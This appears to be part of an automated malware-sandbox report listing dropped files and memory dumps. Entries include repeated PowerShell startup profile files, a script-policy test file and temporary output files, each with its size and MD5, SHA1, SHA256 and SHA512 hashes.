1814fd195e7dfcb8973c95cab2b9d2695c6c2fcc60d0a437d9cceccd92f7873b78975664b23eaec32e92b2c5b43bf29321897c3b3f2a820a36fa79657606959c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6726f033f2a53b02dc7d90b78d1ef9ad

SHA1
33acdfd59364c47d1c1b1a29fd11f8e7b43d2e2d

SHA256
ab8edc322bffe4d76db4afea4f4afb71004188652ab90dcf9fe59a499bd45541

SHA512
3d56def20cdb09eea6052a9b4928de5cc1c92e845fed8eb5ac2ae5644607855b8deee70ddf082168948368607154f8e09a396a7d023c04d7bfdec6ca531bdf9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
acb980915f0066375cc25bb4faee8f21

SHA1
a7261135e4248ddfc259239fa4dd7d76bcb2d281

SHA256
7a7f6c268ab461bfc2d8f9af0ee0b6e423c0eadbf60b1a17cffdcd88e1d44584

SHA512
d993e97283d5081a4e3c1e6d1f7143ad8c746c25866e047a083c6995c261949234e9b5cd1cfd1d830d91766fe1ed42c11311b743974addddba7dcfd1dbd0295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6771ab4a8d17a42a65fa69db7dfa218a

SHA1
c52ab7514d1b9d4b60e45518b83828c4f73d43d6

SHA256
9053138c2ab19d34f81f925f063e868acc1edde6c57635304bb70fa441568d25

SHA512
f12928dc953759cd146064cde08bf10490c53e32c93d7ba114f6305a0a3d43b9d0463ddc0555a46de9df19a3e096639f9a7531e686117ac0ea79032bea7349c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
56521df6aee8e2bb47f96950c324ad9b

SHA1
91c59d80b53d062af8cc586be4833294b52b0637

SHA256
43c396871e90bfd3522c17aa1c88370e5f6c6a20da4e07e47482e37a4e8b27e9

SHA512
519d24237fe2af4b632356448958a05e3c675d4fa8d4a10f22aee3fefc7114e70e0bbb3132339db6709c3f907861d7a43b69fe00f2d83e9ea029f4103a4fea24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d4d9aa0d1f59c308165fcfde8af102ff

SHA1
06c80e42d7c81fe712fb01ee00cc4375bd56ef78

SHA256
ce8919c2f373fbeb62d6ecae9ab255bbeb265be6f3a8f58716dcafe04fda9ccb

SHA512
f0fd85d74956c0b91a1f45a1b66db51032ade95490692b281ca7a21ed44e44acda13eda3fa18288b2d8c7292d4678450754dc2a2177957fac534326953e64aa1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
9eade837a54dabe5b38859f13367c63b

SHA1
86a7c00bbb73e1cb60357f0b87d70fadbbcfb8b4

SHA256
aa392cda3292a9a2272853576f9f3b8264d2daf53444f23fad5012cd6017c133

SHA512
594d4411a21c6589d28db9ade1415357116c45d8c877e266d59a371b4364ca75b4a706a708f6817de34a022189d364ece86b4c66c4eeaa16eb4e05d4df989c7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d47d69d2d1a91eb64f74878ccd8ec8a5

SHA1
ac913114d61df773e4432a87bf4d92c6c4928aa7

SHA256
938ebd2b06448a50c89083855c3ff22964128643e5250c9a8e257559cedd2f11

SHA512
a1f9529d64ca641486ecf4fbada464a9e636d2cf3da06bb5f76c5f17bce5584487e2aa9714ac55bd22980c31fd58fc4f3a4c3f3c29f50b18d3e917316394ab5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e108f0cf9f26c978845bd9a68c096a71

SHA1
f3112b2d029e5294386f046c1ac9f872149e9b0c

SHA256
ecb120f110ae24720f456a6ddb76e49a4faed9d65db299fb703c5410d961415d

SHA512
b612d3d6c80743e9fce08585530a95476dba7a6cca0148414c157f62f763a3f4c96e0654b9f3e8d705e90c7dd25c41d53dab145f0d8fb9364c74a4ccadb000c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1beef086002eb66c9ed8d468856a3a62

SHA1
73e24aa09f2fad2eced21be53eef96f4119365fb

SHA256
b0c2dc6b91bc19ffb595df093969b5c11b49e1b71b408c078db1d96fbdae4703

SHA512
8d7bc200c70b0d53f31f83b7796ad453e3a3f889bf9f8533d2fe0b59796a27d2912dff8ad8476d098b1570feaa262eb2ab02944871d7c9ef22966ac3f6a7a1d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
5389d923d1e6586728ab938e0c982299

SHA1
8e3b1cb4a97e2d5d79435754d12797fe23f78ad0

SHA256
b9bc217f3644a32773c73b8dad104d3e55e4dcb79d933685022356b8ad6470fd

SHA512
03297dd01892313cb76378869dc8dc6056040aeb1088d2896c3b18cd85eccb13a4a9324d58f3b46f04d37a638abfdf9cde3b1aa9b399aa9da3ddb6e337659459

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b39eae893cace0cc15eb94e615b7cb47

SHA1
4e1b2564ea15b5a57ee85e6528b3e1bea14ffdb8

SHA256
c3a5b0e0b4a6294f74bf89c380ce14036cbd634b0da017fce962d7dec37214be

SHA512
4ab10123758069327c2b393907af7ed78e7fa6bbed1f69dd46000ab7e0fc33c4296e9b8ed13318627f6755bb7d37a217bebd0bbdd32959018a0e84f7a91199a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
2e8565b0134e4e424a4fd864d19561aa

SHA1
349b98355001d06c6d658d3b4cb0ef3f3484bc22

SHA256
b4669d08483db6e248d737450b5a6c3dfe89857588d2ec8d0c3487355d0b843b

SHA512
4b2a38547b5e20f1aa94721596f7c4a6c64065a54eb537543aa71e01751f739c66bb9e7b1dbe48e03574baacc6c20bdbb8f2bb4e06bf6afb9a5241c0909a9bc8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f62a28c7e9cd93adee2c56009e6b205e

SHA1
3b3b4d0d060292b0b2ee78cec51cb585d0c71fb7

SHA256
666d4a5243e0b24ae6a4ecf78a47aae98b7f63d37cd625cc5643f2f2c645e738

SHA512
37b8ccf6f3a58a211305bb1a6ad633c771d22cdaeecbce9cfc58ff0f2b5d0ae07d57deb3a988ef2a96f84444bdfa493ccee966a356294d478bc5db8090a9bb07

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rnan31ie.03r.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\output.txt
Filesize
401B

MD5
f5395f51e58c9bb2a620aaa81b3b5e4e

SHA1
4614c683cc4cc24515e0119dfac7dc1f03cd2e68

SHA256
18aab2bd9890d86bf59b339d5fbf1a937c5eba001fa6baefbeb4de12d7b69478

SHA512
599feedd908c7fe289cd7c6bd41a3de701976ca7b43b983a3d6e09c1a76eae6023a3e1dc26e1008b10fa114bedcd67537822fadc6d7e55c7078f1ad75d65b915

Download Submit
C:\Users\Admin\AppData\Local\Temp\output.txt
Filesize
3B

MD5
bc949ea893a9384070c31f083ccefd26

SHA1
cbb8391cb65c20e2c05a2f29211e55c49939c3db

SHA256
6bdf66b5bf2a44e658bea2ee86695ab150a06e600bf67cd5cce245ad54962c61

SHA512
e4288e71070485637ec5825f510a7daa7e75ef6c71a1b755f51e1b0f2e58e5066837f58408ea74d75db42c49372c6027d433a869904fc5efaf4876dfcfde1287

Download Submit
memory/2256-0-0x00007FFC198A3000-0x00007FFC198A5000-memory.dmp

Filesize
8KB

Download
memory/2256-15-0x00007FFC198A0000-0x00007FFC1A361000-memory.dmp

Filesize
10.8MB

Download
memory/2256-12-0x00007FFC198A0000-0x00007FFC1A361000-memory.dmp

Filesize
10.8MB

Download
memory/2256-11-0x00007FFC198A0000-0x00007FFC1A361000-memory.dmp

Filesize
10.8MB

Download
memory/2256-1-0x0000010F4C0A0000-0x0000010F4C0C2000-memory.dmp

Filesize
136KB

Download